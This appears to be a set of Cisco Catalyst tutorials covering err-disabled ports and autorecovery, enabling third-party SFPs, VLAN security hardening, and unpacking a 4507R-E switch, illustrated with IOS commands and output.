
Cisco Catalyst Err-disabled Port State, Enable & Disable Autorecovery Feature

Errdisable is a feature that automatically disables a port on a Cisco Catalyst switch. When a port is error disabled, it is effectively shut down and no traffic is sent or received on that port.

The errdisable feature is supported on most Catalyst switches running Cisco IOS software, including the following models:

  • Catalyst 2940 / 2950 / 2960 / 2960S
  • Catalyst 3550 / 3560 / 3560-E / 3750 / 3750-E
  • Catalyst 4000 / 4500 / 4507R
  • Catalyst 6000 / 6500

The Errdisable feature was designed to inform the administrator when there is a port problem or error. The reasons a Catalyst switch can go into the Errdisable state and shut down a port are many and include:

  • Duplex Mismatch
  • Loopback Error
  • Link Flapping (up/down)
  • Port Security Violation
  • Unicast Flooding
  • UDLD Failure
  • Broadcast Storms
  • BPDU Guard

When a port is in error-disabled state, it is effectively shut down and no traffic is sent or received on that port. The port LED is set to the orange color and, when you issue the show interfaces command, the port status shows as Errdisabled.

Following is an example of what an error-disabled port looks like:

2960G# show interface gigabit0/7
GigabitEthernet0/7 is down, line protocol is down (err-disabled)
  Hardware is Gigabit Ethernet, address is 001b.54aa.c107 (bia 001b.54aa.c107)
  MTU 1500 bytes, BW 100000 Kbit, DLY 100 usec,
     reliability 234/255, txload 1/255, rxload 1/255
  Encapsulation ARPA, loopback not set
  Keepalive set (10 sec)
  Auto-duplex, Auto-speed, media type is 10/100/1000BaseTX
  input flow-control is off, output flow-control is unsupported
  ARP type: ARPA, ARP Timeout 04:00:00
  Last input 18w5d, output 18w5d, output hang never
  Last clearing of "show interface" counters never
  Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
  Queueing strategy: fifo
  Output queue: 0/40 (size/max)
  5 minute input rate 0 bits/sec, 0 packets/sec
  5 minute output rate 0 bits/sec, 0 packets/sec
     1011 packets input, 862666 bytes, 0 no buffer
     Received 157 broadcasts (0 multicast)
     0 runts, 0 giants, 0 throttles
     3021 input errors, 2 CRC, 0 frame, 0 overrun, 0 ignored
     0 watchdog, 144 multicast, 0 pause input
     0 input packets with dribble condition detected
     402154 packets output, 86290866 bytes, 0 underruns
     0 output errors, 0 collisions, 1 interface resets
     0 babbles, 0 late collision, 0 deferred
     0 lost carrier, 0 no carrier, 0 PAUSE output
     0 output buffer failures, 0 output buffers swapped out
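
To quickly list every port currently in the err-disabled state along with the reason that triggered it, most IOS-based Catalyst switches also support the following command (the exact columns displayed vary slightly between platforms and IOS versions):

2960G# show interfaces status err-disabled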

To recover a port that is in an Errdisable state, manual intervention is required: the administrator must access the switch and configure the specific port with the 'shutdown' followed by the 'no shutdown' command. This command sequence will enable the port again; however, if the underlying problem persists, expect to find the port in the Errdisable state again soon.
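
As an illustration, manually recovering the port from our earlier example would look similar to the following, using the interface shown in the output above:

2960G# configure terminal
2960G(config)# interface GigabitEthernet0/7
2960G(config-if)# shutdown
2960G(config-if)# no shutdown
2960G(config-if)# end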

Understanding And Configuring Errdisable AutoRecovery

As outlined above, there are a number of reasons a port can enter the Errdisable state.  One common reason is the Port Security error, also used in our example below.

Of all the errors, Port Security is more of a feature than an error. Port Security allows the restriction of MAC addresses on an interface configured as a layer 2 port, effectively preventing unwanted hubs or switches from being connected to the network. Port Security allows us to specify a single MAC address allowed to connect to a specific port, thus restricting access to a specific computer.

In the case of a violation, Port Security will automatically disable the port. This is the behaviour of the default port security policy when enabling Port Security. Following is a configuration example of port security:

2960G(config)# interface GigabitEthernet0/48
2960G(config-if)# switchport access vlan 2
2960G(config-if)# switchport mode access
2960G(config-if)# switchport port-security
2960G(config-if)# spanning-tree portfast
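
If you want to explicitly lock the port down to a single, specific MAC address as described above, the default policy can be tightened further. The following is a minimal sketch - the MAC address shown is purely illustrative and should be replaced with that of the permitted host:

2960G(config-if)# switchport port-security maximum 1
2960G(config-if)# switchport port-security mac-address 001b.54aa.c107
2960G(config-if)# switchport port-security violation shutdown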

Once a host is connected to the port, we can get more information on its port-security status and actions that will be taken when a violation occurs:

2960G# show port-security interface GigabitEthernet 0/48
Port Security         : Enabled
Port Status           : Secure-up
Violation Mode        : Shutdown
Aging Time            : 0 mins
Aging Type            : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses   : 1
Total MAC Addresses     : 1
Configured MAC Addresses: 0
Sticky MAC Addresses    : 0
Last Source Address:Vlan: 001b.54aa.c107
Security Violation Count: 0

Note that the Violation Mode is set to Shutdown. This means that when a violation is detected, the switch will place GigabitEthernet0/48 in the err-disabled (shutdown) state as shown below:

%PORT_SECURITY-2-PSECURE_VIOLATION: Security violation occurred, caused by MAC address 0031.f6ac.03f5 on port GigabitEthernet0/48

While it's almost always necessary to know when a port security violation occurs, there are some circumstances where autorecovery is a desirable feature, especially during accidental violations.

The following commands enable the autorecovery feature for port security violations and set the recovery interval to 30 seconds:

2960G(config)# errdisable recovery cause psecure-violation
2960G(config)# errdisable recovery interval 30

Determine The Reason For The Errdisabled State

To view the Errdisable reasons, and see for which of them the autorecovery feature has been enabled, use the show errdisable recovery command:

2960G# show errdisable recovery
ErrDisable Reason  Timer Status
-----------------  --------------
udld                Disabled
bpduguard           Disabled
security-violatio   Disabled
channel-misconfig   Disabled
vmps                Disabled
pagp-flap           Disabled
dtp-flap            Disabled
link-flap           Disabled
psecure-violation   Enabled
sfp-config-mismat   Disabled
gbic-invalid        Disabled
dhcp-rate-limit     Disabled
unicast-flood       Disabled
storm-control       Disabled
loopback            Disabled
Timer interval: 30 seconds
Interfaces that will be enabled at the next timeout.

We have now confirmed that autorecovery is enabled for port-security violations. If it is required to enable the Errdisable autorecovery feature for all supported reasons, use the following command:

2960G(config)# errdisable recovery cause all

To test our configuration we forced a port security violation, causing the switch to place the offending port in the shutdown state. Notice that we've enabled autorecovery for all Errdisable reasons, and note the time left before the interface placed in the shutdown state by the port security violation is re-enabled:

2960G# show errdisable recovery
ErrDisable Reason  Timer Status
-----------------  --------------
udld                Enabled
bpduguard           Enabled
security-violatio   Enabled
channel-misconfig   Enabled
vmps                Enabled
pagp-flap           Enabled
dtp-flap            Enabled
link-flap           Enabled
psecure-violation   Enabled
sfp-config-mismat   Enabled
gbic-invalid        Enabled
dhcp-rate-limit     Enabled
unicast-flood       Enabled
storm-control       Enabled
loopback            Enabled

Timer interval: 30 seconds

Interfaces that will be enabled at the next timeout:

Interface  Errdisable reason   Time left(sec)
---------  -----------------  --------------
Gi0/48    security-violation        17

Seventeen seconds later, the switch automatically recovered from the port security violation and re-enabled the interface:

%PM-4-ERR_RECOVER: Attempting to recover from psecure-violation err-disable state on gigabitethernet0/48
18w4d: %LINK-3-UPDOWN: Interface GigabitEthernet0/48, changed state to up
18w4d: %LINEPROTO-5-UPDOWN: Line protocol on Interface GigabitEthernet0/48, changed state to up

Disabling The Errdisable Feature

There are cases where it might be necessary to disable the Errdisable mechanism for specific supported features in order to overcome constant interface shutdowns and auto recoveries.  While the Catalyst IOS does not allow disabling all features we can still fine-tune the mechanism and selectively disable a few.

To view the Errdisable reasons monitored by the switch, use the show errdisable detect command:

2960G# show errdisable detect

ErrDisable Reason      Detection    Mode
-----------------      ---------    ----
bpduguard               Enabled      port
channel-misconfig       Enabled      port
community-limit         Enabled      port
dhcp-rate-limit         Enabled      port
dtp-flap                Enabled      port
gbic-invalid            Enabled      port
inline-power            Enabled      port
invalid-policy          Enabled      port
link-flap               Enabled      port
loopback                Enabled      port
lsgroup                 Enabled      port
mac-limit               Enabled      port
pagp-flap               Enabled      port
port-mode-failure       Enabled      port
psecure-violation       Enabled      port/vlan
security-violation      Enabled      port
sfp-config-mismatch     Enabled      port
small-frame             Enabled      port
storm-control           Enabled      port
udld                    Enabled      port
vmps                    Enabled      port


As shown, the command lists all supported Errdisable reasons.  For our example, let's assume we want to disable the inline-power Errdisable feature.

To achieve this, we simply use the following command:

2960G(config)# no errdisable detect cause inline-power

And verify that Errdisable has been disabled for the feature:

2960G# show errdisable detect
ErrDisable Reason      Detection    Mode
-----------------      ---------    ----
bpduguard               Enabled      port
channel-misconfig       Enabled      port
community-limit         Enabled      port
dhcp-rate-limit         Enabled      port
dtp-flap                Enabled      port
gbic-invalid            Enabled      port
inline-power            Disabled     port
invalid-policy          Enabled      port
link-flap               Enabled      port
loopback                Enabled      port
lsgroup                 Enabled      port
mac-limit               Enabled      port
pagp-flap               Enabled      port
port-mode-failure       Enabled      port
psecure-violation       Enabled      port/vlan
security-violation      Enabled      port
sfp-config-mismatch     Enabled      port
small-frame             Enabled      port
storm-control           Enabled      port
udld                    Enabled      port
vmps                    Enabled      port

Overall, the Errdisable feature is an extremely useful tool if configured and monitored correctly. Take the necessary time to play around with the supported options of your Cisco Catalyst switch and fine-tune it to suit your network needs.


Forcing A Cisco Catalyst Switch To Use 3rd Party SFP Modules

Many companies are seeking Cisco SFP alternatives to help cut down the costs of these expensive modules.

A frequent customer problem with Cisco's new line of Catalyst switches is that they do not support 3rd party (non-Cisco) SFPs - or at least they do not seem to...

If you've just replaced your network switches and tried using any 3rd party SFPs to connect your network backbone, you'll quickly stumble across an error similar to the following:

%PHY-4-UNSUPPORTED_TRANSCEIVER: Unsupported transceiver found in Gi1/0/0
%GBIC_SECURITY_CRYPT-4-VN_DATA_CRC_ERROR: GBIC in port 65538 has bad crc

Congratulations!  The Catalyst switch has just disabled the GBIC port! This happens because Cisco Catalyst switches are configured by default not to work with non-Cisco SFPs.

When an SFP is inserted into a switch's GBIC port, the switch immediately reads a number of values from the SFP and, if it doesn't like what it sees, it throws the above error message and disables the port.

All SFP modules contain a number of values recorded in their EEPROM, including:

  • Vendor Name
  • Vendor ID
  • Serial Number
  • Security Code
  • CRC

How To Force Your Cisco Switch To Use 3rd Party SFPs

Despite the error displayed, which leaves no hope for a solution, keep smiling as you're about to be given one.

There are two undocumented commands which can be used to force the Cisco Catalyst switch to enable the GBIC port and use the 3rd party SFP:

3750G-Stack(config)# service unsupported-transceiver

Warning: When Cisco determines that a fault or defect can be traced to
the use of third-party transceivers installed by a customer or reseller,
then, at Cisco's discretion, Cisco may withhold support under warranty or
a Cisco support program. In the course of providing support for a Cisco
networking product Cisco may require that the end user install Cisco
transceivers if Cisco determines that removing third-party parts will
assist Cisco in diagnosing the cause of a support issue.

3750G-Stack(config)# no errdisable detect cause gbic-invalid

When entering the service unsupported-transceiver command, the switch will automatically throw a warning message as a last attempt to discourage the use of a 3rd party SFP.

The no errdisable detect cause gbic-invalid command will help ensure the GBIC port is not disabled when inserting an invalid GBIC.
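
To confirm that the gbic-invalid reason is no longer being monitored after entering the command, you can re-check the detection list and filter the output; something along these lines should work on most IOS versions (the output column layout is assumed to match the show errdisable detect listing shown earlier):

3750G-Stack# show errdisable detect | include gbic
gbic-invalid            Disabled     port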

Since the service unsupported-transceiver command is undocumented, if you try searching for it with the usual method (?), you won't find it:

3750G-Stack(config)# service ?
  compress-config         Compress the configuration file
  config                  TFTP load config files
  counters                Control aging of interface counters
  dhcp                    Enable DHCP server and relay agent
  disable-ip-fast-frag    Disable IP particle-based fast fragmentation
  exec-callback           Enable exec callback
  exec-wait               Delay EXEC startup on noisy lines
  finger                  Allow responses to finger requests
  hide-telnet-addresses   Hide destination addresses in telnet command
  linenumber              enable line number banner for each exec
  nagle                   Enable Nagle's congestion control algorithm
  old-slip-prompts        Allow old scripts to operate with slip/ppp
  pad                     Enable PAD commands
  password-encryption     Encrypt system passwords
  password-recovery       Disable password recovery
  prompt                  Enable mode specific prompt
  pt-vty-logging          Log significant VTY-Async events
  sequence-numbers        Stamp logger messages with a sequence number
  slave-log               Enable log capability of slave IPs
  tcp-keepalives-in       Generate keepalives on idle incoming network connections
  tcp-keepalives-out      Generate keepalives on idle outgoing network connections
  tcp-small-servers       Enable small TCP servers (e.g., ECHO)
  telnet-zeroidle         Set TCP window 0 when connection is idle
  timestamps              Timestamp debug/log messages
  udp-small-servers       Enable small UDP servers (e.g., ECHO)

3750G-Stack(config)# service

The same applies for the no errdisable detect cause gbic-invalid command.

We tried both the service unsupported-transceiver & no errdisable detect cause gbic-invalid commands on 2960G, 3560G, 3750G, 4507R and 4507R-E Catalyst switches and all accepted the commands without a problem. In fact, if the Catalyst switch is running IOS 12.2(25)SE or above, the undocumented commands are available.

Should 3rd Party SFPs Be Used?

There are mixed feelings about this. We certainly do not recommend using non-Cisco SFPs in production environments; however, in a lab environment, it's most probably a cheap way out.

When using 3rd party GBICs, one must keep in mind that Cisco TAC will not provide any support for problems related to the SFPs as they are totally unsupported. Here is a small portion from the Cisco Catalyst 3750G Q&A that refers to the usage of 3rd party SFP modules on the switch:

Q. Do the Cisco Catalyst 3750 Series Switches interoperate with SFPs from other vendors?

A. Yes, starting from 12.2(25)SE release, the user has the option via CLI to turn on the support for 3rd party SFPs. However, the Cisco TAC will not support such 3rd party SFPs. In the event of any link error involving such 3rd party SFPs the customer will have to replace 3rd party SFPs with Cisco SFPs before any troubleshooting can be done by TAC.

VLAN Security Tips - Best Practices

This article focuses on VLAN Security and its implementation within the business network environment. We provide tips and Cisco CLI commands that will help you upgrade your VLAN network security.

Even though many Administrators and IT Managers are aware of VLAN technologies and concepts, unfortunately, it has been proven that the same does not apply when it comes to VLAN Security. While this section mainly focuses on security implemented on Cisco switches, many of the concepts can be applied on other vendor switches.

The first principle in securing a VLAN network is physical security. If you do not want your devices to be tampered with, physical access to the device must be strictly controlled. Core switches are usually safely located in a datacenter with restricted access; however, edge switches are not that lucky and are usually placed in areas where they are left exposed.

Just as physical security guidelines require equipment to be in a controlled space, VLAN-based security requires the usage of special tools and following a few ‘best security practices’ to give the desired result.

Let’s take a look at a few important steps an Administrator or IT Manager can take, to strip their network from the security problems most networks suffer today.

Removal of Console-port Cables, Introduction of Password-Protected Console/Vty Access with Specified Timeouts and Restricted Access

Console ports on the back side of Cisco switches provide direct access to the system. If no care is taken to secure this access method, then the switch might remain fully exposed to anyone with the popular ‘blue console cable’. Configuration of complex user credentials on the console and telnet/ssh ports will ensure any unwanted visitor remains in the dark when trying to access the device. Using commands such as ‘exec-timeout’, if the Administrator accidentally forgets to log out of a session, it will automatically time out after the configured timeout value.

Following is a set of commands that will help you accomplish the above measures and restrict access to the switch:

Switch# configure terminal
Switch(config)# username admin privilege 15 secret *Firewall.cx*
Switch(config)# line console 0
Switch(config-line)# login local
Switch(config-line)# password cisco
Switch(config-line)# exec-timeout 60 0

We also apply the same commands to our VTY (telnet/ssh) section and create an access-list 115 to restrict telnet/ssh access from specific networks & hosts:

Switch (config)# line vty 0 15
Switch (config-line)# password cisco
Switch (config-line)# login local
Switch (config-line)# exec-timeout 60 0
Switch (config-line)# transport preferred ssh 
Switch (config-line)# access-class 115 in

Following is the access-list 115 we created:

Switch (config)# access-list 115 remark -=[Restrict VTY Access]=-
Switch (config)# access-list 115 permit ip host 74.200.84.4 any
Switch (config)# access-list 115 permit ip host 69.65.126.42 any
Switch (config)# access-list 115 permit ip 192.168.50.0 0.0.0.255 any
Switch (config)# access-list 115 remark

Always ensure the use of the ‘secret’ parameter rather than the ‘password’ parameter in your username syntax when defining usernames and their passwords. The classic ‘password’ parameter uses a much weaker encryption algorithm that is easily decrypted.

To demonstrate this, you can use the 'password' parameter and then copy-paste the encrypted password into our popular Cisco Type 7 Password decrypt page and see what happens!

Avoid Using VLAN1 (Default VLAN)  for your Network Data

VLAN 1 is a special VLAN selected by design to carry specific information such as CDP (Cisco Discovery Protocol), VTP, PAgP and more. VLAN 1 was never intended to be used as a standard VLAN to carry network data.

By default, any Access Link on a Cisco switch is set to VLAN 1, causing a major security issue as direct access to the network backbone is given. As a consequence, VLAN 1 can end up unwisely spanning the entire network if not appropriately pruned.

The practice of using a potentially omnipresent VLAN for management purposes puts trusted devices at higher risk of security attacks from untrusted devices that, by misconfiguration or pure accident, gain access to VLAN 1 and try to exploit this unexpected security hole.

As a general rule of thumb, the network Administrator should prune any VLAN, and in particular VLAN 1 from all ports where that VLAN is not needed.

The following example prunes VLANs 1 to 5 and 7 to 8, allowing access only to VLAN 6 when in trunking mode. Furthermore, we assign the port to VLAN 6 only:

Switch(config)# interface fastethernet0/24
Switch(config-if)# switchport trunk allowed vlan remove ? (help)
WORD  VLAN IDs of disallowed VLANS when this port is in trunking mode


Switch(config-if)# switchport trunk allowed vlan remove 1,2,3,4,5,7,8
Switch(config-if)# switchport access vlan 6
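
To verify that only VLAN 6 remains allowed when the port operates as a trunk, the trunking status and allowed VLAN list can be checked with the following command (output omitted here):

Switch# show interfaces fastethernet0/24 trunk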

Disable High-Risk Protocols on Switchports

If a port is connected to a ‘foreign’ device, don’t try to speak its language – it could be turned to someone else’s advantage and used against your network. Ensure you disable protocols such as CDP, DTP, PAgP and UDLD (UniDirectional Link Detection), and always enable spanning-tree portfast & bpduguard on the port.

Here is an example on how to disable the above mentioned protocols and enable spanning-tree portfast bpduguard:

Switch(config)# interface fastethernet0/24
Switch(config-if)# no cdp enable
Switch(config-if)# no udld port
Switch(config-if)# spanning-tree portfast
Switch(config-if)# spanning-tree bpduguard enable
Switch(config-if)# spanning-tree guard root

Finally, if the port is not to be used, issue the ‘shutdown’ command to ensure it won’t be accessed by anyone without the proper authorization.
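
For example, a whole block of unused ports can be shut down in one go using the interface range command - the port range below is only illustrative and should be adjusted to match your switch:

Switch(config)# interface range fastethernet0/30 - 48
Switch(config-if-range)# shutdown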

VTP Domain, VTP Pruning and Password Protection

Two choices exist here – either configure the VTP domain appropriately or turn off VTP altogether! VTP is a great tool that ensures all VLAN information is carried to your network switches. If the necessary security measures are not taken, wiping your network-wide VLAN configuration is as easy as connecting a switch with the ‘proper’ devastating configuration.

A switch configured with the same ‘VTP domain’, a role of ‘Server’ and a higher ‘VTP revision’ number than the real VTP server (usually the core switch) is all that’s required to cause major disruption and panic across a network of any size. All other switches will automatically ‘listen’ to the new ‘VTP Server’ and wipe all existing VLAN information. You can then start looking for a new job.

A few simple self-explanatory commands on your core switch will help ensure the above scenario is avoided:

CoreSwitch(config)# vtp domain firewall.cx
CoreSwitch(config)# vtp password fedmag secret
CoreSwitch(config)# vtp mode server
CoreSwitch(config)# vtp version 2
CoreSwitch(config)# vtp pruning

Edge switches will require the ‘vtp mode client’ and ‘vtp password’ command, after which they will automatically receive all necessary VLAN information from your core switch.
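
A minimal sketch of the corresponding edge switch configuration, reusing the VTP domain and password from the core switch example above (the ‘EdgeSwitch’ hostname is purely illustrative), would look like this:

EdgeSwitch(config)# vtp domain firewall.cx
EdgeSwitch(config)# vtp password fedmag
EdgeSwitch(config)# vtp mode client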

You can verify the configuration using the ‘show vtp status’ command:

CoreSwitch # show vtp status
VTP Version capable           : 1 to 3
VTP version running           : 2
VTP Domain Name               : firewall.cx
VTP Pruning Mode              : Enabled
VTP Traps Generation          : Disabled
Device ID                     : c062.6b10.5600
Configuration last modified by 192.168.50.1 at 3-16-11 16:53:48
Local updater ID is 192.168.50.1 on interface Vl1 (lowest numbered VLAN interface found)

Feature VLAN:
--------------
VTP Operating Mode               : Server
Maximum VLANs supported locally  : 1005
Number of existing VLANs         : 8
Configuration Revision           : 25
MD5 digest                       : 0xDD 0x9D 0x3B 0xA0 0x80 0xD8 0x7A 0x3A
                                   0x1F 0x2F 0x2A 0xDB 0xCD 0x84 0xCE 0x5F

Control Inter-VLAN Routing Using IP Access Lists

Inter-VLAN routing is a great and necessary feature. Because in many cases there is the need to isolate VLANs or restrict access between them, the usage of IP Access lists is mandatory.

IP Access lists should be created in such a way, that they allow the normal flow of traffic between VLANs, but do not expose the networks that need to be protected. Once the Access Lists are created, they are applied directly on the VLAN interface of the core layer-3 switch.   All traffic from the designated VLAN trying to pass to other VLANs will be denied according to the Access Lists, making sure the core network is not exposed. 

Let’s take a common example to make this tip more practical.

You’ve created a new guest VLAN (VLAN 6 – Network 192.168.141.0/24) to provide free Internet access to your company visitors. The requirement is to allow full Internet access, but restrict access to other VLANs.  In addition, configuration of a DHCP server is also deemed necessary, to make your life easier and less troublesome.

Here’s the configuration used for the DHCP server serving this VLAN:

CoreSwitch(config)# ip dhcp pool vlan6-Guest-Internet 
CoreSwitch(dhcp-config)# network 192.168.141.0 255.255.255.0
CoreSwitch(dhcp-config)# dns-server 192.168.130.5
CoreSwitch(dhcp-config)#  default-router 192.168.141.1

Note that 192.168.141.1 is our core switch VLAN 6 IP Address, and 192.168.130.5 is our DNS server located on a different VLAN.
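
Since 192.168.141.1 is the switch’s own VLAN 6 address, it is also good practice to exclude it (along with any other statically assigned addresses) from the DHCP pool; a typical way of doing this is shown below:

CoreSwitch(config)# ip dhcp excluded-address 192.168.141.1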

Next, we create our necessary Access Lists.

CoreSwitch(config)# access-list 100 remark --[Allow Guest DNS requests to DNS Server]--
CoreSwitch(config)# access-list 100 permit udp 192.168.141.0 0.0.0.255 host 192.168.130.5 eq 53
CoreSwitch(config)# access-list 100 remark [Necessary for DHCP Server to receive Client requests]
CoreSwitch(config)# access-list 100 permit udp any any eq bootps
CoreSwitch(config)# access-list 100 permit udp any any eq bootpc
CoreSwitch(config)# access-list 100 remark --[Deny Guest Access to other VLANs]--
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.50.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.130.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.135.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.160.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.131.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.170.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 deny   ip 192.168.141.0 0.0.0.255 192.168.180.0 0.0.0.255 log
CoreSwitch(config)# access-list 100 remark --[Permit Guest Access to everywhere else –Internet ]--
CoreSwitch(config)# access-list 100 permit ip 192.168.141.0 0.0.0.255 any
CoreSwitch(config)# access-list 100 remark

Notice that we permit DNS and DHCP requests initially, and then deny access to all VLANs. Finally we permit access everywhere else. This logical structure of our Access List is built to comply with the Top-Down Access List examination performed by the Core switch.

If we were to place the DNS or bootp statements last in the Access List, it would clearly fail as the deny statements would prevail. Finally, the ‘log’ parameter seen on our deny statements triggers a log entry on our core switch, allowing us to catch any guests persistently trying to access our other VLANs.

The last step is to apply the access-list to the newly created VLAN interface, in the ‘incoming’ direction:

CoreSwitch(config)# interface vlan 6
CoreSwitch (config-if)# ip access-group 100 in
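
Once traffic starts flowing, you can confirm the list is matching as intended and review the hit counters of the logged deny statements with the following command:

CoreSwitch# show access-lists 100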

Summary

VLAN Technology is wonderful – it offers great enhancements to the network and provides paths to run multiple services in isolated environments without sacrificing speed, quality and network availability. If the necessary basic security guidelines are taken into consideration during its initial implementation and ongoing administration, it can perform wonders and dramatically reduce the administrative overhead for your IT Administrators or Managers. On the other hand, if these security guidelines are ignored, exposure of the whole network is imminent and simply a matter of time.

Perhaps the most serious mistake that an IT Administrator or Manager can make, is to underestimate the importance of the DataLink layer, and of VLANs in particular, in the architecture of switched networks. It should not be forgotten that any network is only as robust as its weakest link, and that therefore an equal amount of attention should be given to any of its layers, to make sure that its entire structure is sound.


Installation of a Cisco Catalyst 4507R-E Layer 3 Switch

Driven by our thirst for technical material and experience, we thought it would be a great idea to start presenting various installations of Cisco equipment around the globe, especially equipment that we don't get to play with every day.

We recently had the chance to unpack and install a Cisco Catalyst 4507R-E Layer 3 switch, which we must admit was extremely impressive. The Cisco Catalyst series is world-known for its superior network performance and modularity that allows it to 'adapt' to any demands your network might have.

For those who haven't seen or worked with a 4507R/4507R-E switch, it's a very big and heavy switch in a metal cabinet (chassis) supporting up to two large power supplies and a total of 7 cards (modules), two of which are the supervisor engines that do all the switching and management work.

The new 4507R-E series is a mammoth switch that allows a maximum of 320Gbps (full duplex) switching capacity by utilising all 7 slots, in other words 5 modules alongside two Supervisor Engine 6-E cards (each with two full line rate 10Gb uplinks).

The 4507R-E switch is shipped in a fairly large box, 50(H)x44(W)x32(D) cm, and weighs around 21 kg with its shipping box. The practical height of the unit for a rack is 11U, which means you need quite a bit of room to make sure it's comfortably placed.

Unboxing the Cisco Catalyst 4507R

Like most Cisco engineers, we couldn't wait to open the heavy box and smell the freshly packaged item that came directly from Cisco's manufacturing line. We carefully moved the 4507R-E box to the datacenter and opened the top side of the box.....

[Image: tk-cisco-switches-install-4507r-1]

The upper area of the picture is where you'll find the two large cube slots for the power supplies. Below them, you can identify 6 out of the 7 slots waiting to be populated and give this monster unbelievable functionality!

After opening the package and removing the plastic wrapping, we placed the switch on the floor so we could take a better look at it.

Because we couldn't wait any longer, we quickly unpacked one of the two power supplies and inserted it into the designated slot. The power supplies installed were rated at 2800 Watts each - providing more than enough juice to power a significant number of IP Phones via the PoE cards installed later on.

The picture below shows both power supplies, one inserted into its slot, while the other was placed on top of the chassis with its connectors facing frontwards so you can get a glimpse of them. When inserted into its slot, the power supply's bottom connectors plug firmly into the chassis connectors and power up the Catalyst switch:

[Image: tk-cisco-switches-install-4507r-2]

Turning on the power supplies for the first time made the datacenter's lights dim instantly as they began to draw power! Interestingly enough, if you take a look at the power supply on top of the chassis, you'll notice three long white strips inside the power supply. These are actually three very large electrolytic capacitors - quite impressive!

For those interested, the power supplies were made by Sony (yes, they had a Sony sticker on them!).

Supervisor Engine Line Card Installation

As we mentioned in the beginning of this article, the powering engine of any 4500 series Catalyst switch is the Supervisor Engine. The Supervisor engines occupy up to two slots on the 4507R chassis, one of them used for redundancy in case the other fails. When working with two supervisor engines, the 4507R is usually configured to automatically switch from one engine to the other without network interruptions, even for a VoIP network with active calls between ends.
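
For reference, here is a minimal sketch of how this supervisor redundancy is typically configured on a Catalyst 4500, assuming an IOS release and Supervisor Engine combination that supports SSO (Stateful Switchover), followed by the command used to check the current redundancy state:

4507R-E(config)# redundancy
4507R-E(config-red)# mode sso
4507R-E(config-red)# end
4507R-E# show redundancy states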

Cisco currently has around 7 different Supervisor Engines, each with unique characteristics, designed for various levels of density and bandwidth requirements.

Currently, the Supervisor Engine 6-E is the best performing engine available, providing 320Gbps bandwidth (full duplex) and 250 million packets per second forwarding rate!

Our users can refer to our popular Cisco Catalyst 4500 Series Zero-Downtime IOS Upgrade Process for Supervisor Engine 7-E, 7L-E, 6L-E and V-10GE Redundant Configurations article to learn how to upgrade their Supervisor Engine without network service interruption.

For our installation, we worked with the Supervisor Engine II-Plus, also known as Cisco part WS-X4013+. Here's one of the supervisor engines in its original antistatic bag:

[Image: tk-cisco-switches-install-4507r-3]

After placing the antistatic wrist-strap contained in the package on my wrist and carefully unwrapping the supervisor engine, the green circuit board with its black towers (heatsinks) is revealed. You can easily see the 5 heatsinks, two of which are quite large and do an excellent job of keeping the processors cool:

[Image: tk-cisco-switches-install-4507r-4]

At the back left side of the board, you can see the supervisor engine's connector, which is equally impressive with 450 pins - 50 on each row!

We took a picture from the back of the board to make sure the connector was clearly visible:

[Image: tk-cisco-switches-install-4507r-5]

Just looking at the connector makes you imagine the number of signals that pass through it to give the 4507R-E the performance rating it has! On the left of the board's connector is the engine's RAM (256MB), while right behind it is the main CPU with the large heatsink, running at 266Mhz.

Here is a close up of the engine's RAM module. The existing 256MB memory module can be removed and upgraded according to your requirements:

[Image: tk-cisco-switches-install-4507r-5a]

Moving to the front side of the Supervisor Engine, you can see the part number and description:

[Image: tk-cisco-switches-install-4507r-6]

The uplink ports visible on the front are GBIC (GigaBit Interface Converter) ports that can be used as normal Gigabit interfaces. By using different GBICs you can connect multimode or singlemode fiber optic cable, or standard CAT5e/CAT6 Ethernet cabling. These ports can come in handy when you're approaching your switch's full capacity.

The impressive Supervisor Engine fits right into one of the two dedicated slots available on the 4507R-E chassis. These are slots 3 & 4 as shown in the picture below. Also visible is the switch's backplane and black connectors awaiting the Supervisor Engine boards (marked with red):

[Image: tk-cisco-switches-install-4507r-7]

We took another picture inside the chassis to make things as clear as possible:

[Image: tk-cisco-switches-install-4507r-8]

Here you can see the backplane with the two Supervisor Engine connectors. The white coloured connectors just above and below the Supervisor Engines are used by the rest of the boards available to the 4507R.

After inserting one of the Supervisor Engines and two power supplies, here is the result:

[Image: tk-cisco-switches-install-4507r-9]

One detail well worth noticing is the colour-coded bars on the left and right side of the Supervisor card. These colour codes exist to ensure engineers don't accidentally try to insert a Supervisor card into an inappropriate slot. The 4507R-E can accept up to two supervisor engines, therefore you have two slots dedicated to them, leaving 5 slots available.

Cisco engineers have thought of everything on the 4507R-E. The cooling mechanism is a good example of smart thinking and intelligent engineering. With 7 cards installed in the system, pumping out a generous amount of heat, the cooling had to be as effective as possible. Any heat trapped between the cards could inadvertently lower the components' reliability and cause damage in the long term.

This challenge was dealt with by placing a fan-tray right next to the cards in a vertical direction. The fan-tray is not easily noticed when taking a quick glance, but the handle on the front gives away that something is hidden in there. Unscrew the top & bottom bolts, place your hand firmly around the handle and pull outwards - the result will surprise you:

[Image: tk-cisco-switches-install-4507r-10]

The picture above shows the eight fans placed on the fan-tray. These fans run at full speed the moment you power the switch on, consuming 140 Watts alone!

Once they start spinning, you really can't argue that the cooling is inadequate, as the air flow produced is so great that when we powered on the 4507R-E, the antistatic bags accidentally forgotten on the right-hand side of the chassis were sucked almost immediately against the chassis grille, just as happens when you leave a plastic bag behind a powerful fan!

Of course, anything on the left side of the chassis (viewable in our picture) would be immediately blown away.

After inserting the fan-tray back in place, it was time to take a look around and see what else was left to play with.

Our eyes caught another Cisco box and we approached it, picked it up and checked out the label:

[Image: tk-cisco-switches-install-4507r-11]

The product number WS-X4548-GB-RJ45V and size of the package made it clear we were looking at a card designated for the 4507R-E. Opening the package confirmed our thoughts - this was a 48port Gigabit card with PoE support:

[Image: tk-cisco-switches-install-4507r-12]

